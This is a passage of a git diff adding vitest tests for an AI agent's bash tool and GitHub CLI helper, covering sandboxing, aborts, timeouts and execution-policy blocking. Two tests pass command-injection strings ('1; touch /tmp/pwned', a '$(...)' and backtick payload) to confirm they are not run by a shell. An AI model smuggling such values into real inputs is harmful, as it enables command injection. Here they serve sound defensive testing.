+						/Refusing to run unsandboxed|not supported on platform/,
+					);
+					expect(result.exitCode).toBe(1);
+				} finally {
+					await sandbox.dispose();
+				}
+			});
+
 			it("passes environment variables", async () => {
 				if (!isNativeSandboxAvailable()) return;
 
diff --git a/test/tools/bash.test.ts b/test/tools/bash.test.ts
index fecf2c9f0..f56e458d5 100644
--- a/test/tools/bash.test.ts
+++ b/test/tools/bash.test.ts
@@ -78,6 +78,36 @@ describe("bash tool", () => {
 			expect(output).toContain("Registry OK");
 		});
 
+		it("passes abort signals into sandbox execution", async () => {
+			const controller = new AbortController();
+			const sandbox = {
+				exec: vi.fn().mockResolvedValue({
+					stdout: "sandbox ok",
+					stderr: "",
+					exitCode: 0,
+				}),
+				readFile: vi.fn(),
+				writeFile: vi.fn(),
+				exists: vi.fn(),
+				dispose: vi.fn(),
+			};
+
+			const result = await bashTool.execute(
+				"bash-sandbox-signal",
+				{ command: "gh auth status" },
+				controller.signal,
+				{ sandbox },
+			);
+
+			expect(getTextOutput(result)).toContain("sandbox ok");
+			expect(sandbox.exec).toHaveBeenCalledWith(
+				"gh auth status",
+				undefined,
+				undefined,
+				controller.signal,
+			);
+		});
+
 		it("executes pwd command", async () => {
 			const result = await bashTool.execute("bash-2", {
 				command: "pwd",
@@ -390,6 +420,36 @@ describe("bash tool", () => {
 				vi.useRealTimers();
 			}
 		});
+
+		it("passes abort signals through sandbox execution", async () => {
+			const controller = new AbortController();
+			const sandbox = {
+				exec: vi.fn().mockResolvedValue({
+					stdout: "sandbox ok",
+					stderr: "",
+					exitCode: 0,
+				}),
+				readFile: vi.fn(),
+				writeFile: vi.fn(),
+				exists: vi.fn(),
+				dispose: vi.fn(),
+			};
+
+			const result = await bashTool.execute(
+				"bash-sandbox-abort",
+				{ command: "echo sandbox" },
+				controller.signal,
+				{ sandbox },
+			);
+
+			expect(result.isError).toBeFalsy();
+			expect(sandbox.exec).toHaveBeenCalledWith(
+				"echo sandbox",
+				undefined,
+				undefined,
+				controller.signal,
+			);
+		});
 	});
 
 	describe("special characters", () => {
diff --git a/test/tools/gh-helpers.test.ts b/test/tools/gh-helpers.test.ts
new file mode 100644
index 000000000..5d5b893cb
--- /dev/null
+++ b/test/tools/gh-helpers.test.ts
@@ -0,0 +1,1059 @@
+import { EventEmitter } from "node:events";
+import { beforeEach, describe, expect, it, vi } from "vitest";
+import type { Sandbox } from "../../src/sandbox/types.js";
+
+const childProcessMock = vi.hoisted(() => ({
+	spawn: vi.fn(),
+}));
+const shellEnvMock = vi.hoisted(() => ({
+	resolveShellEnvironment: vi.fn(),
+}));
+const shellUtilsMock = vi.hoisted(() => ({
+	killProcessTree: vi.fn(),
+}));
+const execpolicyMock = vi.hoisted(() => ({
+	checkCommand: vi.fn(),
+}));
+const safeModeMock = vi.hoisted(() => ({
+	requirePlanCheck: vi.fn(),
+}));
+const bashToolMock = vi.hoisted(() => ({
+	execute: vi.fn(),
+}));
+
+vi.mock("node:child_process", () => childProcessMock);
+vi.mock("../../src/utils/shell-env.js", () => shellEnvMock);
+vi.mock("../../src/tools/shell-utils.js", () => shellUtilsMock);
+vi.mock("../../src/safety/execpolicy.js", () => execpolicyMock);
+vi.mock("../../src/safety/safe-mode.js", () => safeModeMock);
+
+vi.mock("../../src/tools/bash.js", () => ({ bashTool: bashToolMock }));
+
+import {
+	checkGhCliAvailable,
+	executeGhCommand,
+} from "../../src/tools/gh-helpers.js";
+
+type MockChildProcess = EventEmitter & {
+	pid?: number;
+	stdout: EventEmitter;
+	stderr: EventEmitter;
+	kill: ReturnType<typeof vi.fn>;
+};
+
+function createMockChildProcess(): MockChildProcess {
+	const child = new EventEmitter() as MockChildProcess;
+	child.pid = 1234;
+	child.stdout = new EventEmitter();
+	child.stderr = new EventEmitter();
+	child.kill = vi.fn();
+	return child;
+}
+
+function getTextOutput(
+	result: Awaited<ReturnType<typeof executeGhCommand>>,
+): string {
+	const first = result.content[0];
+	return first && "text" in first ? first.text : "";
+}
+
+describe("executeGhCommand", () => {
+	beforeEach(() => {
+		vi.useRealTimers();
+		childProcessMock.spawn.mockReset();
+		shellEnvMock.resolveShellEnvironment.mockReset();
+		shellEnvMock.resolveShellEnvironment.mockReturnValue({ PATH: "/mock-bin" });
+		shellUtilsMock.killProcessTree.mockReset();
+		execpolicyMock.checkCommand.mockReset();
+		execpolicyMock.checkCommand.mockReturnValue({
+			decision: "allow",
+			matchedRules: [],
+		});
+		safeModeMock.requirePlanCheck.mockReset();
+		bashToolMock.execute.mockReset();
+	});
+
+	it("passes gh arguments without a shell", async () => {
+		const child = createMockChildProcess();
+		childProcessMock.spawn.mockReturnValueOnce(child);
+
+		const promise = executeGhCommand("gh-argv", [
+			"pr",
+			"view",
+			"1; touch /tmp/pwned",
+		]);
+		child.stdout.emit("data", Buffer.from("ok"));
+		child.emit("close", 0);
+
+		const result = await promise;
+
+		expect(childProcessMock.spawn).toHaveBeenCalledWith(
+			"gh",
+			["pr", "view", "1; touch /tmp/pwned"],
+			{
+				detached: true,
+				env: { PATH: "/mock-bin" },
+				stdio: ["ignore", "pipe", "pipe"],
+				shell: false,
+			},
+		);
+		expect(execpolicyMock.checkCommand).toHaveBeenCalledWith(
+			"gh pr view '1; touch /tmp/pwned'",
+			process.cwd(),
+		);
+		expect(shellEnvMock.resolveShellEnvironment).toHaveBeenCalledWith(
+			undefined,
+			{
+				workspaceDir: process.cwd(),
+			},
+		);
+		expect(getTextOutput(result)).toBe("ok");
+	});
+
+	it("blocks gh argv commands forbidden by execpolicy", async () => {
+		execpolicyMock.checkCommand.mockReturnValueOnce({
+			decision: "forbidden",
+			matchedRules: [
+				{
+					type: "prefix",
+					matchedPrefix: ["gh", "repo", "clone"],
+				},
+			],
+		});
+
+		const result = await executeGhCommand("gh-policy", [
+			"repo",
+			"clone",
+			"owner/repo",
+		]);
+
+		expect(childProcessMock.spawn).not.toHaveBeenCalled();
+		expect(result.isError).toBe(true);
+		expect(getTextOutput(result)).toContain("Command blocked by execpolicy");
+		expect(getTextOutput(result)).toContain("prefix: gh repo clone");
+	});
+
+	it("executes gh through the sandbox when one is provided", async () => {
+		const sandbox = {
+			exec: vi.fn(),
+			execWithArgs: vi.fn().mockResolvedValue({
+				stdout: "sandbox ok",
+				stderr: "",
+				exitCode: 0,
+			}),
+			readFile: vi.fn(),
+			writeFile: vi.fn(),
+			exists: vi.fn(),
+			dispose: vi.fn(),
+		};
+
+		const result = await executeGhCommand(
+			"gh-sandbox",
+			["repo", "clone", "owner/repo$(touch /tmp/pwned)`whoami`"],
+			undefined,
+			sandbox as unknown as Sandbox,
+		);
+
+		expect(childProcessMock.spawn).not.toHaveBeenCalled();
+		expect(sandbox.exec).not.toHaveBeenCalled();
+		expect(sandbox.execWithArgs).toHaveBeenCalledWith(
+			"gh",
+			["repo", "clone", "owner/repo$(touch /tmp/pwned)`whoami`"],
+			{
+				env: { PATH: "/mock-bin" },
+				maxBuffer: 40 * 1024 + 1,
+				signal: expect.any(AbortSignal),
+			},
+		);
+		expect(getTextOutput(result)).toBe("sandbox ok");
+	});
+
+	it("cleans up sandbox abort listeners after successful execution", async () => {
+		const listeners = new Set<() => void>();
+		const signal = {
+			aborted: false,
+			reason: undefined,
+			addEventListener: vi.fn(
+				(_event: string, listener: EventListenerOrEventListenerObject) => {
+					if (typeof listener === "function") {
+						listeners.add(listener);
+					}
+				},
+			),
+			removeEventListener: vi.fn(
+				(_event: string, listener: EventListenerOrEventListenerObject) => {
+					if (typeof listener === "function") {
+						listeners.delete(listener);
+					}
+				},
+			),
+		} as unknown as AbortSignal;
+		const sandbox = {
+			exec: vi.fn(),
+			execWithArgs: vi.fn().mockResolvedValue({
+				stdout: "sandbox ok",
+				stderr: "",
+				exitCode: 0,
+			}),
+			readFile: vi.fn(),
+			writeFile: vi.fn(),
+			exists: vi.fn(),
+			dispose: vi.fn(),
+		};
+
+		const result = await executeGhCommand(
+			"gh-sandbox-cleanup",
+			["pr", "view", "1"],
+			signal,
+			sandbox as unknown as Sandbox,
+		);
+
+		expect(result.isError).toBe(false);
+		expect(listeners.size).toBe(0);
+		expect(signal.removeEventListener).toHaveBeenCalledTimes(2);
+	});
+
+	it("requires safe-mode plans for mutating gh commands", async () => {
+		safeModeMock.requirePlanCheck.mockImplementationOnce(() => {
+			throw new Error("Safe mode requires a plan before executing gh.");
+		});
+
+		await expect(
+			executeGhCommand("gh-safe-mode", ["repo", "clone", "owner/repo"]),
+		).rejects.toThrow("Safe mode requires a plan");
+
+		expect(safeModeMock.requirePlanCheck).toHaveBeenCalledWith("gh");
+		expect(childProcessMock.spawn).not.toHaveBeenCalled();
+	});
+
+	it("does not require safe-mode plans for read-only gh commands", async () => {
+		const child = createMockChildProcess();
+		childProcessMock.spawn.mockReturnValueOnce(child);
+
+		const promise = executeGhCommand("gh-readonly", ["pr", "view", "1"]);
+		child.stdout.emit("data", Buffer.from("ok"));
+		child.emit("close", 0);
+
+		await expect(promise).resolves.toBeTruthy();
+		expect(safeModeMock.requirePlanCheck).not.toHaveBeenCalled();
+	});
+
+	it("caps oversized sandbox execWithArgs stdout and reports truncation", async () => {
+		const sandbox = {
+			exec: vi.fn(),
+			execWithArgs: vi.fn().mockResolvedValue({
+				stdout: "x".repeat(50 * 1024),
+				stderr: "",
+				exitCode: 0,
+			}),
+			readFile: vi.fn(),
+			writeFile: vi.fn(),
+			exists: vi.fn(),
+			dispose: vi.fn(),
+		};
+
+		const result = await executeGhCommand(
+			"gh-sandbox-large-output",
+			["pr", "diff", "1"],
+			undefined,
+			sandbox as unknown as Sandbox,
+		);
+		const output = getTextOutput(result);
+		const capturedOutput = output.split("\n\n")[0] ?? "";
+
+		expect(sandbox.execWithArgs).toHaveBeenCalledWith(
+			"gh",
+			["pr", "diff", "1"],
+			expect.objectContaining({ maxBuffer: 40 * 1024 + 1 }),
+		);
+		expect((capturedOutput.match(/x/g) ?? []).length).toBe(40 * 1024);
+		expect(output).toContain("stdout exceeded 40KB limit and was truncated");
+	});
+
+	it("fails closed when sandbox gh lacks argv execution support", async () => {
+		const sandbox = {
+			exec: vi.fn(),
+			readFile: vi.fn(),
+			writeFile: vi.fn(),
+			exists: vi.fn(),
+			dispose: vi.fn(),
+		};
+
+		const result = await executeGhCommand(
+			"gh-sandbox-no-argv",
+			["repo", "clone", "owner/repo"],
+			undefined,
+			sandbox as unknown as Sandbox,
+		);
+
+		expect(result.isError).toBe(true);
+		expect(getTextOutput(result)).toContain(
+			"requires argv-capable sandbox support",
+		);
+		expect(sandbox.exec).not.toHaveBeenCalled();
+	});
+
+	it("reports sandbox execWithArgs aborts as cancelled", async () => {
+		const sandbox = {
+			exec: vi.fn(),
+			execWithArgs: vi.fn(
+				(
+					_command: string,
+					_args: string[] = [],
+					options?: { signal?: AbortSignal },
+				) =>
+					new Promise((resolve) => {
+						options?.signal?.addEventListener(
+							"abort",
+							() =>
+								resolve({
+									stdout: "",
+									stderr: "",
+									exitCode: 0,
+								}),
+							{ once: true },
+						);
+					}),
+			),
+			readFile: vi.fn(),
+			writeFile: vi.fn(),
+			exists: vi.fn(),
+			dispose: vi.fn(),
+		};
+		const controller = new AbortController();
+
+		const promise = executeGhCommand(
+			"gh-sandbox-abort-exec-with-args",
+			["repo", "clone", "owner/repo"],
+			controller.signal,
+			sandbox as unknown as Sandbox,
+		);
+		controller.abort();
+
+		const result = await promise;
+
+		expect(result.isError).toBe(true);
+		expect(getTextOutput(result)).toContain("Command cancelled");
+	});
+
+	it("times out sandbox gh execution even when the sandbox ignores aborts", async () => {
+		vi.useFakeTimers();
+		try {
+			const sandbox = {
+				exec: vi.fn(),
+				execWithArgs: vi.fn(() => new Promise(() => {})),
+				readFile: vi.fn(),
+				writeFile: vi.fn(),
+				exists: vi.fn(),
+				dispose: vi.fn(),
+			};
+
+			const promise = executeGhCommand(
+				"gh-sandbox-timeout",
+				["pr", "view", "1"],
+				undefined,
+				sandbox as unknown as Sandbox,
+			);
+			await vi.advanceTimersByTimeAsync(90_000);
+			const result = await promise;
+
+			expect(result.isError).toBe(true);
+			expect(getTextOutput(result)).toContain("Command timed out after 90s");
+		} finally {
+			vi.useRealTimers();
+		}
+	});
+
+	it("removes sandbox abort listeners after gh completes", async () => {
+		const controller = new AbortController();
+		const addListener = vi.spyOn(controller.signal, "addEventListener");
+		const removeListener = vi.spyOn(controller.signal, "removeEventListener");
+		const sandbox = {
+			exec: vi.fn(),
+			execWithArgs: vi.fn().mockResolvedValue({
+				stdout: "ok",
+				stderr: "",
+				exitCode: 0,
+			}),
+			readFile: vi.fn(),
+			writeFile: vi.fn(),
+			exists: vi.fn(),
+			dispose: vi.fn(),
+		};
+
+		const result = await executeGhCommand(
+			"gh-sandbox-listener-cleanup",
+			["pr", "view", "1"],
+			controller.signal,
+			sandbox as unknown as Sandbox,
+		);
+
+		expect(result.isError).not.toBe(true);
+		expect(addListener).toHaveBeenCalledWith(
+			"abort",
+			expect.any(Function),
+			expect.objectContaining({ once: true }),
+		);
+		expect(removeListener).toHaveBeenCalledWith("abort", expect.any(Function));
+		expect(removeListener).toHaveBeenCalledTimes(2);
+	});
+
+	it("does not spawn gh when the signal is already aborted", async () => {
+		const controller = new AbortController();
+		controller.abort();
+
+		await expect(
+			executeGhCommand(
+				"gh-aborted-before-start",
+				["pr", "view"],
+				controller.signal,
+			),
+		).rejects.toThrow("GitHub CLI command aborted before start");
+
+		expect(childProcessMock.spawn).not.toHaveBeenCalled();
+	});
+
+	it("catches aborts that happen while gh is spawning", async () => {
+		const child = createMockChildProcess();
+		const controller = new AbortController();
+		childProcessMock.spawn.mockImplementationOnce(() => {
+			controller.abort();
+			return child;
+		});
+
+		const promise = executeGhCommand(
+			"gh-abort-during-spawn",
+			["pr", "view"],
+			controller.signal,
+		);
+
+		expect(childProcessMock.spawn).toHaveBeenCalledWith(
+			"gh",
+			["pr", "view"],
+			expect.objectContaining({ signal: controller.signal }),
+		);
+		expect(shellUtilsMock.killProcessTree).toHaveBeenCalledWith(1234);
+
+		child.emit("close", null);
+		const result = await promise;
+
+		expect(result.isError).toBe(true);
+		expect(getTextOutput(result)).toContain("Command cancelled");
+		expect(getTextOutput(result)).not.toContain("Exit code: null");
+	});
+
+	it("returns install guidance when gh is missing on direct spawn", async () => {
+		const child = createMockChildProcess();
+		childProcessMock.spawn.mockReturnValueOnce(child);
+
+		const promise = executeGhCommand("gh-missing", ["pr", "view"]);
+		child.emit(
+			"error",
+			Object.assign(new Error("spawn gh ENOENT"), { code: "ENOENT" }),
+		);
+
+		const result = await promise;
+
+		expect(result.isError).toBe(true);
+		expect(getTextOutput(result)).toContain(
+			"GitHub CLI (gh) is not installed.",
+		);
+	});
+
+	it("returns install guidance for sandbox gh probes with non-zero output", async () => {
+		const sandbox = {
+			exec: vi.fn(),
+			execWithArgs: vi.fn().mockResolvedValueOnce({
+				stdout: "",
+				stderr: "gh: command not found",
+				exitCode: 127,
+			}),
+			readFile: vi.fn(),
+			writeFile: vi.fn(),
+			exists: vi.fn(),
+			dispose: vi.fn(),
+		};
+
+		const result = await checkGhCliAvailable(
+			undefined,
+			sandbox as unknown as Sandbox,
+		);
+
+		expect(result).not.toBeNull();
+		expect(getTextOutput(result!)).toContain(
+			"GitHub CLI (gh) is not installed.",
+		);
+		expect(bashToolMock.execute).not.toHaveBeenCalled();
+		expect(sandbox.exec).not.toHaveBeenCalled();
+		expect(sandbox.execWithArgs).toHaveBeenCalledWith(
+			"gh",
+			["--version"],
+			expect.objectContaining({
+				env: { PATH: "/mock-bin" },
+				maxBuffer: 40 * 1024 + 1,
+			}),
+		);
+	});
+
+	it("surfaces sandbox gh probe capability failures instead of reporting gh missing", async () => {
+		const sandbox = {
+			exec: vi.fn(),
+			execWithArgs: vi.fn().mockResolvedValueOnce({
+				stdout: "",
+				stderr: "Daytona abortable execution requires session API support",
+				exitCode: 1,
+			}),
+			readFile: vi.fn(),
+			writeFile: vi.fn(),
+			exists: vi.fn(),
+			dispose: vi.fn(),
+		};
+
+		const result = await checkGhCliAvailable(
+			undefined,
+			sandbox as unknown as Sandbox,
+		);
+
+		expect(result?.isError).toBe(true);
+		expect(getTextOutput(result!)).toContain(
+			"GitHub CLI availability check failed.",
+		);
+		expect(getTextOutput(result!)).toContain(
+			"Daytona abortable execution requires session API support",
+		);
+		expect(getTextOutput(result!)).not.toContain(
+			"GitHub CLI (gh) is not installed.",
+		);
+	});
+
+	it("treats Daytona session timeout probe failures as timeout errors", async () => {
+		const sandbox = {
+			exec: vi.fn(),
+			execWithArgs: vi.fn().mockResolvedValueOnce({
+				stdout: "",
+				stderr: "Daytona session command timed out",
+				exitCode: 1,
+			}),
+			readFile: vi.fn(),
+			writeFile: vi.fn(),
+			exists: vi.fn(),
+			dispose: vi.fn(),
+		};
+
+		const result = await checkGhCliAvailable(
+			undefined,
+			sandbox as unknown as Sandbox,
+		);
+
+		expect(result?.isError).toBe(true);
+		expect(getTextOutput(result!)).toContain(
+			"Daytona session command timed out",
+		);
+		expect(getTextOutput(result!)).not.toContain(
+			"GitHub CLI availability check failed.",
+		);
+	});
+
+	it("does not report sandbox runtime ENOENT errors as missing gh", async () => {
+		const sandbox = {
+			exec: vi.fn(),
+			execWithArgs: vi.fn().mockResolvedValueOnce({
+				stdout: "",
+				stderr: "spawn docker ENOENT",
+				exitCode: 1,
+			}),
+			readFile: vi.fn(),
+			writeFile: vi.fn(),
+			exists: vi.fn(),
+			dispose: vi.fn(),
+		};
+
+		const result = await checkGhCliAvailable(
+			undefined,
+			sandbox as unknown as Sandbox,
+		);
+
+		expect(result?.isError).toBe(true);
+		expect(getTextOutput(result!)).toContain(
+			"GitHub CLI availability check failed.",
+		);
+		expect(getTextOutput(result!)).toContain("spawn docker ENOENT");
+		expect(getTextOutput(result!)).not.toContain(
+			"GitHub CLI (gh) is not installed.",
+		);
+	});
+
+	it("reports already-cancelled sandbox gh probes as cancelled", async () => {
+		const controller = new AbortController();
+		controller.abort();
+		const sandbox = {
+			exec: vi.fn(),
+			execWithArgs: vi.fn(() => new Promise(() => {})),
+			readFile: vi.fn(),
+			writeFile: vi.fn(),
+			exists: vi.fn(),
+			dispose: vi.fn(),
+		};
+
+		const result = await checkGhCliAvailable(
+			controller.signal,
+			sandbox as unknown as Sandbox,
+		);
+
+		expect(result?.isError).toBe(true);
+		expect(getTextOutput(result!)).toContain("Command cancelled");
+		expect(getTextOutput(result!)).not.toContain("Command timed out");
+	});
+
+	it("passes resolved shell env to sandbox gh auth probes", async () => {
+		const sandbox = {
+			exec: vi.fn(),
+			execWithArgs: vi
+				.fn()
+				.mockResolvedValueOnce({
+					stdout: "gh version 2.0.0",
+					stderr: "",
+					exitCode: 0,
+				})
+				.mockResolvedValueOnce({
+					stdout: "Logged in to github.com",
+					stderr: "",
+					exitCode: 0,
+				}),
+			readFile: vi.fn(),
+			writeFile: vi.fn(),
+			exists: vi.fn(),
+			dispose: vi.fn(),
+		};
+		shellEnvMock.resolveShellEnvironment.mockReturnValueOnce({
+			GH_TOKEN: "token-from-policy",
+			PATH: "/mock-bin",
+		});
+
+		const result = await checkGhCliAvailable(
+			undefined,
+			sandbox as unknown as Sandbox,
+		);
+
+		expect(result).toBeNull();
+		expect(bashToolMock.execute).not.toHaveBeenCalled();
+		expect(sandbox.exec).not.toHaveBeenCalled();
+		expect(sandbox.execWithArgs).toHaveBeenNthCalledWith(
+			1,
+			"gh",
+			["--version"],
+			{
+				env: { GH_TOKEN: "token-from-policy", PATH: "/mock-bin" },
+				maxBuffer: 40 * 1024 + 1,
+				signal: expect.any(AbortSignal),
+			},
+		);
+		expect(sandbox.execWithArgs).toHaveBeenNthCalledWith(
+			2,
+			"gh",
+			["auth", "status"],
+			{
+				env: { GH_TOKEN: "token-from-policy", PATH: "/mock-bin" },
+				maxBuffer: 40 * 1024 + 1,
+				signal: expect.any(AbortSignal),
+			},
+		);
+	});
+
+	it("surfaces sandbox gh auth probe failures after gh is installed", async () => {
+		const sandbox = {
+			exec: vi.fn(),
+			execWithArgs: vi
+				.fn()
+				.mockResolvedValueOnce({
+					stdout: "gh version 2.0.0",
+					stderr: "",
+					exitCode: 0,
+				})
+				.mockResolvedValueOnce({
+					stdout: "",
+					stderr: "HTTP 401: bad credentials",
+					exitCode: 1,
+				}),
+			readFile: vi.fn(),
+			writeFile: vi.fn(),
+			exists: vi.fn(),
+			dispose: vi.fn(),
+		};
+
+		const result = await checkGhCliAvailable(
+			undefined,
+			sandbox as unknown as Sandbox,
+		);
+
+		expect(result?.isError).toBe(true);
+		expect(getTextOutput(result!)).toContain(
+			"GitHub CLI authentication check failed.",
+		);
+		expect(getTextOutput(result!)).toContain("HTTP 401: bad credentials");
+		expect(getTextOutput(result!)).not.toContain(
+			"GitHub CLI (gh) is not installed.",
+		);
+	});
+
+	it("reports sandbox auth probe capability failures as availability failures", async () => {
+		const sandbox = {
+			exec: vi.fn(),
+			execWithArgs: vi
+				.fn()
+				.mockResolvedValueOnce({
+					stdout: "gh version 2.0.0",
+					stderr: "",
+					exitCode: 0,
+				})
+				.mockResolvedValueOnce({
+					stdout: "",
+					stderr: "Daytona abortable execution requires session API support",
+					exitCode: 1,
+				}),
+			readFile: vi.fn(),
+			writeFile: vi.fn(),
+			exists: vi.fn(),
+			dispose: vi.fn(),
+		};
+
+		const result = await checkGhCliAvailable(
+			undefined,
+			sandbox as unknown as Sandbox,
+		);
+
+		expect(result?.isError).toBe(true);
+		expect(getTextOutput(result!)).toContain(
+			"GitHub CLI availability check failed.",
+		);
+		expect(getTextOutput(result!)).toContain(
+			"Daytona abortable execution requires session API support",
+		);
+		expect(getTextOutput(result!)).not.toContain(
+			"GitHub CLI authentication check failed.",
+		);
+	});
+
+	it("times out sandbox gh availability probes", async () => {
+		vi.useFakeTimers();
+		try {
+			const sandbox = {
+				exec: vi.fn(),
+				execWithArgs: vi.fn(
+					(
+						_command: string,
+						_args: string[] = [],
+						_options?: { signal?: AbortSignal },
+					) => new Promise(() => {}),
+				),
+				readFile: vi.fn(),
+				writeFile: vi.fn(),
+				exists: vi.fn(),
+				dispose: vi.fn(),
+			};
+
+			const promise = checkGhCliAvailable(
+				undefined,
+				sandbox as unknown as Sandbox,
+			);
+			await vi.advanceTimersByTimeAsync(90_000);
+			const result = await promise;
+
+			expect(result?.isError).toBe(true);
+			expect(getTextOutput(result!)).toContain("Command timed out after 90s");
+			expect(sandbox.execWithArgs).toHaveBeenCalledWith(
+				"gh",
+				["--version"],
+				expect.objectContaining({
+					signal: expect.any(AbortSignal),
+				}),
+			);
+		} finally {
+			vi.useRealTimers();
+		}
+	});
+
+	it("times out sandbox gh auth probes", async () => {
+		vi.useFakeTimers();
+		try {
+			const sandbox = {
+				exec: vi.fn(),
+				execWithArgs: vi
+					.fn()
+					.mockResolvedValueOnce({
+						stdout: "gh version 2.0.0",
+						stderr: "",
+						exitCode: 0,
+					})
+					.mockImplementationOnce(
+						(
+							_command: string,
+							_args: string[] = [],
+							_options?: { signal?: AbortSignal },
+						) => new Promise(() => {}),
+					),
+				readFile: vi.fn(),
+				writeFile: vi.fn(),
+				exists: vi.fn(),
+				dispose: vi.fn(),
+			};
+
+			const promise = checkGhCliAvailable(
+				undefined,
+				sandbox as unknown as Sandbox,
+			);
+			await vi.advanceTimersByTimeAsync(90_000);
+			const result = await promise;
+
+			expect(result?.isError).toBe(true);
+			expect(getTextOutput(result!)).toContain("Command timed out after 90s");
+			expect(sandbox.execWithArgs).toHaveBeenNthCalledWith(
+				2,
+				"gh",
+				["auth", "status"],
+				expect.objectContaining({
+					signal: expect.any(AbortSignal),
+				}),
+			);
+		} finally {
+			vi.useRealTimers();
+		}
+	});
+
+	it("times out sandbox gh commands even if execWithArgs never settles", async () => {
+		vi.useFakeTimers();
+		try {
+			const sandbox = {
+				exec: vi.fn(),
+				execWithArgs: vi.fn(
+					(
+						_command: string,
+						_args: string[] = [],
+						_options?: { signal?: AbortSignal },
+					) => new Promise(() => {}),
+				),
+				readFile: vi.fn(),
+				writeFile: vi.fn(),
+				exists: vi.fn(),
+				dispose: vi.fn(),
+			};
+			let settled = false;
+
+			const promise = executeGhCommand(
+				"gh-sandbox-timeout",
+				["pr", "checks"],
+				undefined,
+				sandbox as unknown as Sandbox,
+			).then((result) => {
+				settled = true;
+				return result;
+			});
+
+			await vi.advanceTimersByTimeAsync(90_000);
+			await Promise.resolve();
+
+			expect(settled).toBe(true);
+			const result = await promise;
+
+			expect(result.isError).toBe(true);
+			expect(getTextOutput(result)).toContain("Command timed out after 90s");
+			expect(sandbox.execWithArgs).toHaveBeenCalledWith(
+				"gh",
+				["pr", "checks"],
+				expect.objectContaining({
+					signal: expect.any(AbortSignal),
+				}),
+			);
+		} finally {
+			vi.useRealTimers();
+		}
+	});
+
+	it("fails closed when sandbox gh probes lack argv execution support", async () => {
+		const sandbox = {
+			exec: vi.fn(),
+			readFile: vi.fn(),
+			writeFile: vi.fn(),
+			exists: vi.fn(),
+			dispose: vi.fn(),
+		};
+
+		const result = await checkGhCliAvailable(
+			undefined,
+			sandbox as unknown as Sandbox,
+		);
+
+		expect(result?.isError).toBe(true);
+		expect(getTextOutput(result!)).toContain(
+			"require argv-capable sandbox support",
+		);
+		expect(bashToolMock.execute).not.toHaveBeenCalled();
+		expect(sandbox.exec).not.toHaveBeenCalled();
+	});
+
+	it("times out sandbox gh probes after the default timeout", async () => {
+		vi.useFakeTimers();
+		try {
+			const sandbox = {
+				exec: vi.fn(),
+				execWithArgs: vi.fn(
+					(
+						_command: string,
+						_args: string[] = [],
+						options?: { signal?: AbortSignal },
+					) =>
+						new Promise((resolve) => {
+							options?.signal?.addEventListener(
+								"abort",
+								() =>
+									resolve({
+										stdout: "",
+										stderr: "",
+										exitCode: 1,
+									}),
+								{ once: true },
+							);
+						}),
+				),
+				readFile: vi.fn(),
+				writeFile: vi.fn(),
+				exists: vi.fn(),
+				dispose: vi.fn(),
+			};
+
+			const promise = checkGhCliAvailable(
+				undefined,
+				sandbox as unknown as Sandbox,
+			);
+			await vi.advanceTimersByTimeAsync(90_000);
+			const result = await promise;
+
+			expect(result?.isError).toBe(true);
+			expect(getTextOutput(result!)).toContain("Command timed out after 90s");
+			expect(getTextOutput(result!)).not.toContain("not installed");
+			expect(sandbox.execWithArgs).toHaveBeenCalledTimes(1);
+		} finally {
+			vi.useRealTimers();
+		}
+	});
+
+	it("reports sandbox gh cancellations when the signal aborts during setup", async () => {
+		const reentrantSignal = {
+			aborted: false,
+			reason: new Error("sandbox aborted"),
+			addEventListener: vi.fn(() => {
+				reentrantSignal.aborted = true;
+			}),
+			removeEventListener: vi.fn(),
+		} as unknown as AbortSignal;
+		const sandbox = {
+			exec: vi.fn(),
+			execWithArgs: vi.fn(
+				(
+					_command: string,
+					_args: string[] = [],
+					options?: { signal?: AbortSignal },
+				) =>
+					options?.signal?.aborted
+						? Promise.reject(new Error("sandbox aborted"))
+						: Promise.resolve({
+								stdout: "",
+								stderr: "",
+								exitCode: 0,
+							}),
+			),
+			readFile: vi.fn(),
+			writeFile: vi.fn(),
+			exists: vi.fn(),
+			dispose: vi.fn(),
+		};
+
+		const result = await executeGhCommand(
+			"gh-sandbox-abort-during-setup",
+			["repo", "clone", "owner/repo"],
+			reentrantSignal,
+			sandbox as unknown as Sandbox,
+		);
+
+		expect(result.isError).toBe(true);
+		expect(getTextOutput(result)).toContain("Command cancelled");
+	});
+
+	it("caps oversized stdout and reports truncation", async () => {
+		const child = createMockChildProcess();
+		childProcessMock.spawn.mockReturnValueOnce(child);
+
+		const promise = executeGhCommand("gh-large-output", ["api", "repos"]);
+		child.stdout.emit("data", Buffer.from("x".repeat(50 * 1024)));
+		child.emit("close", 0);
+
+		const result = await promise;
+		const output = getTextOutput(result);
+		const capturedOutput = output.split("\n\n")[0] ?? "";
+
+		expect((capturedOutput.match(/x/g) ?? []).length).toBe(40 * 1024);
+		expect(output).toContain("stdout exceeded 40KB limit and was truncated");
+	});
+
+	it("preserves isError when rewriting friendly auth failures", async () => {
+		const child = createMockChildProcess();
+		childProcessMock.spawn.mockReturnValueOnce(child);
+
+		const promise = executeGhCommand("gh-auth-error", ["pr", "view", "1"]);
+		child.stderr.emit(
+			"data",
+			Buffer.from("gh: not logged in\nRun: gh auth login"),
+		);
+		child.emit("close", 1);
+
+		const result = await promise;
+
+		expect(result.isError).toBe(true);
+		expect(getTextOutput(result)).toContain("GitHub CLI is not authenticated.");
+	});
+
+	it("terminates gh after the default timeout", async () => {
+		vi.useFakeTimers();
+		try {
+			const child = createMockChildProcess();
+			childProcessMock.spawn.mockReturnValueOnce(child);
+
+			const promise = executeGhCommand("gh-timeout", ["pr", "checks"]);
+			await vi.advanceTimersByTimeAsync(90_000);
+
+			expect(shellUtilsMock.killProcessTree).toHaveBeenCalledWith(1234);
+			expect(child.kill).not.toHaveBeenCalled();
+
+			child.emit("close", null);
+			const result = await promise;
+
+			expect(result.isError).toBe(true);
+			expect(getTextOutput(result)).toContain("Command timed out after 90s");
+		} finally {
+			vi.useRealTimers();
+		}
+	});
+
+	it("kills the process tree when aborted", async () => {
+		const child = createMockChildProcess();
+		childProcessMock.spawn.mockReturnValueOnce(child);
+		const controller = new AbortController();
+
+		const promise = executeGhCommand(
+			"gh-abort",
+			["repo", "clone"],
+			controller.signal,
+		);
+		controller.abort();
+
+		expect(shellUtilsMock.killProcessTree).toHaveBeenCalledWith(1234);
+		expect(child.kill).not.toHaveBeenCalled();
+
+		child.emit("close", null);
+		const result = await promise;
+
+		expect(result.isError).toBe(true);
+		expect(getTextOutput(result)).toContain("Command cancelled");
+		expect(getTextOutput(result)).not.toContain("Exit code: null");
+	});
+});
diff --git a/test/tools/gh.test.ts b/test/tools/gh.test.ts
